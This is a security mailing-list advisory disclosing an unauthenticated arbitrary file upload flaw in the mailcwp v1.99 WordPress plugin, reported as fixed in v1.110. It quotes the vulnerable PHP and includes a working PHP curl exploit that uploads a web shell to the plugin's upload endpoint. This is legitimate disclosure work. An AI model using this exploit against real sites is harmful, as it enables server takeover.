Date: Thu, 16 Jul 2015 20:18:11 -0400 From: "Larry W. Cashdollar" <larry0@...com> To: Open Source Security <oss-security@...ts.openwall.com> Subject: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-09 Download Site: https://wordpress.org/plugins/mailcwp/ Vendor: CadreWorks Pty Ltd Vendor Notified: 2015-07-09 fixed in v1.110 Vendor Contact: Contact Page via WP site Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website. Vulnerability: The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server: 2 $message_id = $_REQUEST["message_id"]; 3 $upload_dir = $_REQUEST["upload_dir"]; . . 8 $fileName = $_FILES["file"]["name"]; 9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName"); Exploitation requires the attacker to guess a writeable location in the http server root. CVEID: OSVDB: Exploit Code: • <?php • /*Larry W. Cashdollar @_larry0 • Exploit for mailcwp v1.99 shell will be called 1-shell.php. • 7/9/2015 • */ • $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo "POST to $target_url $file_name_with_full_path"; • $post = array('file' => 'shell.php','file'=>'@...file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "<hr>"; • echo $result; • echo "<hr>"; • ?> • Advisory: http://www.vapid.dhs.org/advisory.php?v=138
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.